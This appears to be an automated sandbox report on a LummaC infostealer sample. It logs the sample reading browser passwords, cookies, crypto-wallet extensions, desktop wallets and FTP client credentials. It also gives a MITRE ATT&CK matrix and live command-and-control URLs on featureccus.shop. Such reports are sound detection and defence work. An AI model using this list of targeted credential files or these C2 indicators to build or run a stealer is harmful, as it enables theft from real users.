Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1398662498.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1398662498.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1398740502.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1429009276.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6420, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1499423252.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	43%	Virustotal		Browse
file.exe	42%	ReversingLabs	Win32.Trojan.Amadey

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://featureccus.shop/zE	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAnm	0%	Avira URL Cloud	safe
https://featureccus.shop/RE	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAn=	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	Avira URL Cloud	safe
https://featureccus.shop/	0%	Avira URL Cloud	safe
https://featureccus.shop:443/bdMAn94	0%	Avira URL Cloud	safe
https://featureccus.shop:443/bdMAn	100%	Avira URL Cloud	malware
https://featureccus.shop/bdMAn	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAnb	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAn2x	0%	Avira URL Cloud	safe
https://featureccus.shop/ics_	0%	Avira URL Cloud	safe
https://featureccus.shop/4405	0%	Avira URL Cloud	safe
https://featureccus.shop:443/bdMAnd_user_idWA	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAnM3	0%	Avira URL Cloud	safe
https://featureccus.shop/Y	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
featureccus.shop	172.67.204.104	true	true		unknown
defaulemot.run	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://featureccus.shop/bdMAn	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://featureccus.shop/zE	file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1336671821.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://featureccus.shop/bdMAn=	file.exe, 00000002.00000003.1362793644.0000000000F07000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://featureccus.shop:443/bdMAn94	file.exe, 00000002.00000003.1498948316.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500039877.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499243054.0000000000ED1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabv20-	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	false		high
https://featureccus.shop/bdMAnm	file.exe, 00000002.00000003.1362793644.0000000000F07000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://featureccus.shop/RE	file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://featureccus.shop:443/bdMAn	file.exe, 00000002.00000003.1453464368.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1428845550.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://featureccus.shop/	file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://featureccus.shop:443/bdMAnd_user_idWA	file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://featureccus.shop/4405	file.exe, 00000002.00000003.1362793644.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1336671821.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://featureccus.shop/ics_	file.exe, 00000002.00000003.1396383652.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1395856585.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://featureccus.shop/bdMAnb	file.exe, 00000002.00000003.1429009276.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
